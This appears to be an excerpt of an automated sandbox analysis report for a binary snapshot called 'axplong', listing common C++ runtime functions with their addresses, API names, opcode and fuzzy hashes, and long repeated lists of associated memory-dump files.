                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                                                                                    • String ID: 7oq<
                                                                                                                                                                                                                                                    • API String ID: 1418687624-377005865
                                                                                                                                                                                                                                                    • Opcode ID: 23a1379720751ae555d1373edafaf969aeb89ef0fd8279ad26c4ee34fc88afa5
                                                                                                                                                                                                                                                    • Instruction ID: ba58f160b3f34e22b993f91968260eadbb119f95fc8777d6311ded6d3e099a09
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23a1379720751ae555d1373edafaf969aeb89ef0fd8279ad26c4ee34fc88afa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F4118719007549BDB20AB599905B9FB7EAEF55730F00862EE80993741EF34AA08C7E5
                                                                                                                                                                                                                                                    Function 006AF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID: 8"m$`'m
                                                                                                                                                                                                                                                    • API String ID: 3903695350-2741468995
                                                                                                                                                                                                                                                    • Opcode ID: adda3f481234f1c5fa6d026bca96afe7f5184fd640faa636e982018c9198f610
                                                                                                                                                                                                                                                    • Instruction ID: 635f5f2a5a7f992554cc8512613bb3b5736a343e28d72a6d2f85f26cbf42cc39
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adda3f481234f1c5fa6d026bca96afe7f5184fd640faa636e982018c9198f610
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D316D316002059FEB61BBF8D945B9A73EAAF42320F10452EE447D7252DF32AD80CF56
                                                                                                                                                                                                                                                    Function 00673930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00673962
                                                                                                                                                                                                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 006739A1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                                    • String ID: pBg
                                                                                                                                                                                                                                                    • API String ID: 3366076730-3123275838
                                                                                                                                                                                                                                                    • Opcode ID: a4679832065059eb78407af1eb8183f093ea31a13f1666c97d44c31f3b722e5f
                                                                                                                                                                                                                                                    • Instruction ID: 9b4546ab6add3d5eba16028c912759dc36670a1993df7afa6858da9f01f6c555
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4679832065059eb78407af1eb8183f093ea31a13f1666c97d44c31f3b722e5f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA4124B0601B058FD720CF18C588B9ABBF2FF44315F10861DE96A8B341E7B4AA15CF80
                                                                                                                                                                                                                                                    Function 00672440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067247E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 6c1d43a668a045b9d9b5b027492bfba7b088c04378a09048d3ab092a1349ff56
                                                                                                                                                                                                                                                    • Instruction ID: 38b7b6b04e9419140391560444f01c7ae632e796001a3d6e25a2d250399c6ea2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c1d43a668a045b9d9b5b027492bfba7b088c04378a09048d3ab092a1349ff56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F0A0B591021D67C714FEE8D801D89B7EDDA16310B008A2AF644EB600F770FA448BA9
                                                                                                                                                                                                                                                    Function 00673400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00672AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00672B23
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067343E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
